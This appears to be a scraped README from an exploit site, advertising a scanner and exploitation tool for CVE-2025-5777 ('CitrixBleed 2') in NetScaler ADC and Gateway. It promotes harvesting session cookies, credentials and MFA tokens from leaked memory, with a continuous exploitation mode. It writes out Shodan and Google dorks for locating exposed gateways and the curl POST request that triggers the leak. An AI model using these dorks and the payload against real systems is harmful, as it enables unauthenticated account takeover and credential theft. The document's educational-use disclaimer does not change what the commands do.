## https://sploitus.com/exploit?id=3B1862CA-F554-5B99-BDEF-E4901F92CF06
# CVE-2025-5777: The Ultimate Scanner π

---
### π CVE: `CVE-2025-5777`
### π¨ Severity: **Critical**
### π¨βπ» Author: `Virendra Kumar & CyberLeelawat`
### π License: [MIT](./LICENSE)
---
An advanced, powerful, and easy-to-use tool designed to detect and exploit **CVE-2025-5777** (aka **CitrixBleed 2**).
This script not only identifies the memory leak vulnerability but **demonstrates real-world impact** by parsing sensitive data like session cookies and credentials directly from leaked memory.
---
## π§ What is CVE-2025-5777?
`CVE-2025-5777` is a **critical memory leak vulnerability** in **NetScaler (Citrix) ADC and Gateway** products.
> 𧨠It allows unauthenticated, remote attackers to **leak sensitive memory content** like:
- Session cookies (e.g., `NSC_AAAC`)
- Usernames and passwords
- MFA tokens and more
This can result in **full account takeover** without credentials or MFA, making it a **high-impact RCE-level vulnerability**.
---
## β¨ Features
β
**High-Speed Asynchronous Scanning**
β Built with `asyncio` & `aiohttp` to scan targets blazing fast.
β
**Intelligent Data Extraction**
β Parses **human-readable strings** from leaked memory (like creds, tokens).
β
**Sensitive Data Detection**
β Detects critical patterns like session cookies and flags high-risk data.
β
**Leak Reporting**
β Automatically stores leaks into `leaks.txt` for clean offline analysis.
β
**PoC + Exploitation Loop**
β Supports one-time check or continuous exploitation mode with `--check` flag.
---
## β οΈ Disclaimer
> β **This tool is for educational and authorized bug bounty testing only.**
> β Unauthorized use on systems you donβt own or have permission to test is **illegal**.
> π§βπ» The author is not responsible for any misuse or damage caused by this tool.
---
## π Official References
- [NIST NVD β CVE-2025-5777](https://nvd.nist.gov/vuln/detail/CVE-2025-5777)
- [Citrix Security Advisory β CTX693420](https://support.citrix.com/article/CTX693420)
---
## π Shodan Dorks
- http.html:"_ctxstxt_NetscalerAAA" ssl.cert.subject.CN:"target.com" port:6443
- title:"Netscaler Gateway" ssl.cert.subject.CN:"target.com" port:6443
- title:"NetScaler AAA" ssl.cert.subject.CN:"target.com" port:6443
- http.favicon.hash:-1166125415 ssl.cert.subject.CN:"target.com" port:6443
- http.favicon.hash:-1292923998 ssl.cert.subject.CN:"target.com" port:6443
---
## π Google Dorks
- inurl:/logon/LogonPoint/tmindex.html site:target.com
---
## π Curl Command
```bash
curl -s -k -X POST "https://target.com/p/u/doAuthentication.do" -d "login"
```
Exploit Payload Path
```https://target.com/p/u/doAuthentication.do```
Use Burp Suite to capture and manipulate the request.
## π Credits & Acknowledgements
- Tool Developer: Virendra Kumar & CyberLeelawat
- Original Vulnerability Research: The foundational research and original exploit concepts for this vulnerability were published by security researchers at Watchtwr Labs and others in the community. This tool builds upon their essential work.
---
π License
This project is licensed under the MIT License β see the LICENSE file for details.